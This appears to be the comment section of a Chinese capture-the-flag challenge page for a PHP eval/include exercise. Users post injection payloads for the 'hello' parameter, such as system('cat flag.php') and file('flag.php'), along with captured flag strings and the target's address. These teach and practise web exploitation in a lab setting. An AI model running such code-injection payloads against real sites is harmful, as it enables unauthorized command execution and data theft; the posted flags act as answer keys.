评分(10)
解题动态
cccjfddfgyd 攻破了该题 9小时前
hsk_zy 攻破了该题 10小时前
yogalin 攻破了该题 10小时前
main123 攻破了该题 10小时前
k12g 攻破了该题 11小时前
li3427379304 攻破了该题 14小时前
呢称被我吃掉了 攻破了该题 16小时前
haduck 攻破了该题 18小时前
xiao ovo 攻破了该题 19小时前
笛安丶 攻破了该题 20小时前
进击的鱼尾 攻破了该题 1天前
1112223 攻破了该题 1天前
jjjdas 攻破了该题 1天前
nanaqilin 攻破了该题 1天前
小白RM 攻破了该题 1天前
xc8888888 攻破了该题 1天前
tschick 攻破了该题 1天前
哈哈1 攻破了该题 1天前
一骑绝尘 攻破了该题 1天前
评论
Lsec 2年前
举报
1:?hello=file('flag.php') 2:?hello=);highlight_file('flag.php');var_dump( 3:?hello=eval(system('cat flag.php | base64'))
你呀你ii 3年前
举报
?hello=eval(system('cat flag.php | base64'))
baianquanzu 2年前
举报
?hello=system('sort flag.php')
xlxlxl 2年前
举报
?hello=system('cat flag.php')
凉情梦回 2年前
举报
?hello=system('cat flag.php')
liu666 2年前
举报
flag{930e51a7a500775093c95aae8b67e404}
userdong 2年前
举报
?hello=system('cat flag.php')
riacky 2年前
举报
?hello=system('cat flag*')
hhthht 3年前
举报
flag{cea9de710e2926a7c49f12318caf3912}
ryan777 3年前
举报
根据题中出现的include函数,怀疑存在文件包含漏洞,后面再看题目的eval函数得知存在代码执行的漏洞,可以结合二者,将flag.php的信息获取传递给参数a的值进行代码执行输出flag。即?hello=file('flag.php')
AmazingForself 3年前
举报
看网站中出示的码可以看出是php文件包含题故按文件包含程序去做在URL栏输入?hello=file('flag.php')即可完成解答,详细有关文件包含可以参考:https://blog.csdn.net/qq_42181428/article/details/87090539
ryl123569 3年前
举报
?hello=file('flag,php') flag{a16626d75937389051135500053bcd36}
xiaobaiermei 3年前
举报
这里应该算的上是个文件包含吧
17leaf 3年前
举报
flag{4ccf17345bf8d8b3c5a6d005cf17e00a}
cap 3年前
举报
为啥我这样不行 ?hello=system("cat flag.php")
Restwlaq 2年前
举报
因为cat查看php的源码,经过var_dump还是字符串形式的代码,php中这样的代码还是被解析了,所以就看不到了。所以必须base64转一下,防止被执行。 ?hello=system(’cat flag.php | base64')
你的宝 3年前
举报
http://114.67.175.224:15626/?hello=file(%27flag.php%27)